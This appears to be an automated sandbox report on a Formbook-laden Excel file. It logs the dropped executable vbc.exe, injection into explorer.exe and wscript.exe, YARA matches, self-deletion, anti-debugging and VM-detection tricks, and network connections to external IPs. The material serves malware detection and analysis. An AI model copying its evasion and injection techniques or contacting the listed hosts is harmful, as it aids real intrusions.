Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FB50 NtCreateKey,LdrInitializeThunk, 9_2_0232FB50
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FBB8 NtQueryInformationToken,LdrInitializeThunk, 9_2_0232FBB8
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232F900 NtReadFile,LdrInitializeThunk, 9_2_0232F900
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232F9F0 NtClose,LdrInitializeThunk, 9_2_0232F9F0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 9_2_0232FED0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FFB4 NtCreateSection,LdrInitializeThunk, 9_2_0232FFB4
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FC60 NtMapViewOfSection,LdrInitializeThunk, 9_2_0232FC60
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FD8C NtDelayExecution,LdrInitializeThunk, 9_2_0232FD8C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FDC0 NtQuerySystemInformation,LdrInitializeThunk, 9_2_0232FDC0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_02330078 NtResumeThread, 9_2_02330078
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_02330060 NtQuerySection, 9_2_02330060
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_02330048 NtProtectVirtualMemory, 9_2_02330048
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_023310D0 NtOpenProcessToken, 9_2_023310D0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0233010C NtOpenDirectoryObject, 9_2_0233010C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_02331148 NtOpenThread, 9_2_02331148
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_023301D4 NtSetValueKey, 9_2_023301D4
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FA20 NtQueryInformationFile, 9_2_0232FA20
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FA50 NtEnumerateValueKey, 9_2_0232FA50
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FBE8 NtQueryVirtualMemory, 9_2_0232FBE8
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232F8CC NtWaitForSingleObject, 9_2_0232F8CC
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_02331930 NtSetContextThread, 9_2_02331930
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232F938 NtWriteFile, 9_2_0232F938
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FE24 NtWriteVirtualMemory, 9_2_0232FE24
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FEA0 NtReadVirtualMemory, 9_2_0232FEA0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FF34 NtQueueApcThread, 9_2_0232FF34
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FFFC NtCreateProcessEx, 9_2_0232FFFC
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FC30 NtOpenProcess, 9_2_0232FC30
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_02330C40 NtGetContextThread, 9_2_02330C40
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FC48 NtSetInformationFile, 9_2_0232FC48
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FC90 NtUnmapViewOfSection, 9_2_0232FC90
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FD5C NtEnumerateKey, 9_2_0232FD5C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_02331D80 NtSuspendThread, 9_2_02331D80
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_00089D60 NtCreateFile, 9_2_00089D60
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_00089E10 NtReadFile, 9_2_00089E10
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_00089E90 NtClose, 9_2_00089E90
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_00089F40 NtAllocateVirtualMemory, 9_2_00089F40
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_00089E0A NtReadFile, 9_2_00089E0A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_00089E8F NtClose, 9_2_00089E8F
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_00E9F0FF 4_2_00E9F0FF
Source: C:\Users\Public\vbc.exe Code function: 4_2_00E9FCFF 4_2_00E9FCFF
Source: C:\Users\Public\vbc.exe Code function: 4_2_00E9F8DF 4_2_00E9F8DF
Source: C:\Users\Public\vbc.exe Code function: 4_2_00E9F4D3 4_2_00E9F4D3
Source: C:\Users\Public\vbc.exe Code function: 4_2_00E9EC2A 4_2_00E9EC2A
Source: C:\Users\Public\vbc.exe Code function: 4_2_00E98B85 4_2_00E98B85
Source: C:\Users\Public\vbc.exe Code function: 4_2_00E9C377 4_2_00E9C377
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041E87B 6_2_0041E87B
Source: C:\Users\Public\vbc.exe Code function: 6_2_00401030 6_2_00401030
Source: C:\Users\Public\vbc.exe Code function: 6_2_00402D88 6_2_00402D88
Source: C:\Users\Public\vbc.exe Code function: 6_2_00402D90 6_2_00402D90
Source: C:\Users\Public\vbc.exe Code function: 6_2_00409E40 6_2_00409E40
Source: C:\Users\Public\vbc.exe Code function: 6_2_00409E3B 6_2_00409E3B
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041DFAF 6_2_0041DFAF
Source: C:\Users\Public\vbc.exe Code function: 6_2_00402FB0 6_2_00402FB0
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E9F0FF 6_2_00E9F0FF
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E9F8DF 6_2_00E9F8DF
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E98B85 6_2_00E98B85
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E9C377 6_2_00E9C377
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E9FCFF 6_2_00E9FCFF
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E9F4D3 6_2_00E9F4D3
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E9EC2A 6_2_00E9EC2A
Source: C:\Users\Public\vbc.exe Code function: 6_2_0085E0C6 6_2_0085E0C6
Source: C:\Users\Public\vbc.exe Code function: 6_2_0088D005 6_2_0088D005
Source: C:\Users\Public\vbc.exe Code function: 6_2_00863040 6_2_00863040
Source: C:\Users\Public\vbc.exe Code function: 6_2_0087905A 6_2_0087905A
Source: C:\Users\Public\vbc.exe Code function: 6_2_008DD06D 6_2_008DD06D
Source: C:\Users\Public\vbc.exe Code function: 6_2_008ED13F 6_2_008ED13F
Source: C:\Users\Public\vbc.exe Code function: 6_2_0085E2E9 6_2_0085E2E9
Source: C:\Users\Public\vbc.exe Code function: 6_2_00901238 6_2_00901238
Source: C:\Users\Public\vbc.exe Code function: 6_2_009063BF 6_2_009063BF
Source: C:\Users\Public\vbc.exe Code function: 6_2_0085F3CF 6_2_0085F3CF
Source: C:\Users\Public\vbc.exe Code function: 6_2_008863DB 6_2_008863DB
Source: C:\Users\Public\vbc.exe Code function: 6_2_00862305 6_2_00862305
Source: C:\Users\Public\vbc.exe Code function: 6_2_00867353 6_2_00867353
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: PI202009255687.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Found potential string decryption / allocating functions
Source: C:\Users\Public\vbc.exe Code function: String function: 0085E2A8 appears 58 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00E95331 appears 62 times
Source: C:\Users\Public\vbc.exe Code function: String function: 008CF970 appears 84 times
Source: C:\Users\Public\vbc.exe Code function: String function: 008A373B appears 248 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0085DF5C appears 128 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00E94F38 appears 64 times
Source: C:\Users\Public\vbc.exe Code function: String function: 008A3F92 appears 132 times
Source: C:\Windows\SysWOW64\wscript.exe Code function: String function: 023AF970 appears 84 times
Source: C:\Windows\SysWOW64\wscript.exe Code function: String function: 02383F92 appears 132 times
Source: C:\Windows\SysWOW64\wscript.exe Code function: String function: 0238373B appears 245 times
Source: C:\Windows\SysWOW64\wscript.exe Code function: String function: 0233E2A8 appears 38 times
Source: C:\Windows\SysWOW64\wscript.exe Code function: String function: 0233DF5C appears 121 times
Yara signature match
Source: 00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2389221261.0000000000070000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2389221261.0000000000070000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2389348504.0000000000240000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2389348504.0000000000240000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2215222613.0000000000170000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2215222613.0000000000170000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2179579442.0000000000EA8000.00000004.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2179579442.0000000000EA8000.00000004.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2215291644.00000000002B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2215291644.00000000002B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2215328255.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2215328255.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.e90000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.e90000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: vbc.exe, 00000004.00000002.2178642047.0000000000910000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2193008298.0000000003C40000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@9/6@4/4
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$PI202009255687.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR1B3D.tmp
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: PI202009255687.xlsx ReversingLabs: Detection: 25%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: unknown Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: PI202009255687.xlsx Static file information: File size 2625536 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb source: vbc.exe, wscript.exe
Source: Binary string: wscript.pdb source: vbc.exe, 00000006.00000002.2215307464.00000000002E0000.00000040.00000001.sdmp
Source: Binary string: wscript.pdbN source: vbc.exe, 00000006.00000002.2215307464.00000000002E0000.00000040.00000001.sdmp
Source: PI202009255687.xlsx Initial sample: OLE indicators vbamacros = False
Source: PI202009255687.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Users\Public\vbc.exe Code function: 4_2_00E95EF8 __decode_pointer,LoadLibraryA,GetProcAddress,GetLastError,GetLastError,GetLastError,__encode_pointer,InterlockedExchange,FreeLibrary, 4_2_00E95EF8
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_00E94F7D push ecx; ret 4_2_00E94F90
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041797C push ecx; retf 6_2_0041797F
Source: C:\Users\Public\vbc.exe Code function: 6_2_00417936 push esp; retf 6_2_00417937
Source: C:\Users\Public\vbc.exe Code function: 6_2_0040E3E7 push ebp; iretd 6_2_0040E3E8
Source: C:\Users\Public\vbc.exe Code function: 6_2_00417C0D push ss; ret 6_2_00417C13
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041CEB5 push eax; ret 6_2_0041CF08
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041CF6C push eax; ret 6_2_0041CF72
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041CF02 push eax; ret 6_2_0041CF08
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041CF0B push eax; ret 6_2_0041CF72
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041D7C6 push cs; retf 6_2_0041D7C7
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041678C push 00000050h; retf 6_2_0041678F
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E94F7D push ecx; ret 6_2_00E94F90
Source: C:\Users\Public\vbc.exe Code function: 6_2_0085DFA1 push ecx; ret 6_2_0085DFB4
Source: C:\Users\Public\vbc.exe Code function: 6_2_0028E3E6 pushad ; ret 6_2_0028E3E7
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0233DFA1 push ecx; ret 9_2_0233DFB4
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0007E3E7 push ebp; iretd 9_2_0007E3E8
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0008678C push 00000050h; retf 9_2_0008678F
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0008D7C6 push cs; retf 9_2_0008D7C7
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_00087936 push esp; retf 9_2_00087937
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0008797C push ecx; retf 9_2_0008797F
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_00087C0D push ss; ret 9_2_00087C13
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0008CEB5 push eax; ret 9_2_0008CF08
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0008CF0B push eax; ret 9_2_0008CF72
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0008CF02 push eax; ret 9_2_0008CF08
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0008CF6C push eax; ret 9_2_0008CF72

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xE6
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: PI202009255687.xlsx Stream path 'EncryptedPackage' entropy: 7.99992874048 (max. 8.0)

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe RDTSC instruction interceptor: First address: 00000000000798E4 second address: 00000000000798EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe RDTSC instruction interceptor: First address: 0000000000079B5E second address: 0000000000079B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_00409A90 rdtsc 6_2_00409A90
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2688 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\explorer.exe TID: 1688 Thread sleep time: -54000s >= -30000s
Source: C:\Windows\SysWOW64\wscript.exe TID: 2232 Thread sleep time: -55000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: explorer.exe, 00000008.00000000.2193737356.0000000004234000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000008.00000002.2389363675.00000000001F5000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000000.2193784848.0000000004263000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: explorer.exe, 00000008.00000000.2193737356.0000000004234000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000008.00000002.2389389885.0000000000231000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Users\Public\vbc.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\wscript.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_00409A90 rdtsc 6_2_00409A90
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\Public\vbc.exe Code function: 6_2_0040ACD0 LdrLoadDll, 6_2_0040ACD0
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\Public\vbc.exe Code function: 4_2_00E95465 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_00E95465
Contains functionality to dynamically determine API calls
Source: C:\Users\Public\vbc.exe Code function: 4_2_00E95EF8 __decode_pointer,LoadLibraryA,GetProcAddress,GetLastError,GetLastError,GetLastError,__encode_pointer,InterlockedExchange,FreeLibrary, 4_2_00E95EF8
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 4_2_00E91000 mov eax, dword ptr fs:[00000030h] 4_2_00E91000
Source: C:\Users\Public\vbc.exe Code function: 4_2_000A1C53 mov eax, dword ptr fs:[00000030h] 4_2_000A1C53
Source: C:\Users\Public\vbc.exe Code function: 4_2_000A11ED mov eax, dword ptr fs:[00000030h] 4_2_000A11ED
Source: C:\Users\Public\vbc.exe Code function: 4_2_000A1BB3 mov eax, dword ptr fs:[00000030h] 4_2_000A1BB3
Source: C:\Users\Public\vbc.exe Code function: 4_2_000A1BF0 mov eax, dword ptr fs:[00000030h] 4_2_000A1BF0
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E91000 mov eax, dword ptr fs:[00000030h] 6_2_00E91000
Source: C:\Users\Public\vbc.exe Code function: 6_2_008626F8 mov eax, dword ptr fs:[00000030h] 6_2_008626F8
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_023426F8 mov eax, dword ptr fs:[00000030h] 9_2_023426F8
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\wscript.exe Process token adjusted: Debug
Source: C:\Users\Public\vbc.exe Code function: 4_2_00E95465 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_00E95465
Source: C:\Users\Public\vbc.exe Code function: 4_2_00E9305A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_00E9305A
Source: C:\Users\Public\vbc.exe Code function: 4_2_00E93912 SetUnhandledExceptionFilter, 4_2_00E93912
Source: C:\Users\Public\vbc.exe Code function: 4_2_00E996FF __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00E996FF
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E9305A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_00E9305A
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E93912 SetUnhandledExceptionFilter, 6_2_00E93912
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E95465 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_00E95465
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E996FF __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00E996FF

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 160.153.138.53 80
Source: C:\Windows\explorer.exe Network Connect: 104.164.99.242 80
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Users\Public\vbc.exe protection: execute and read and write
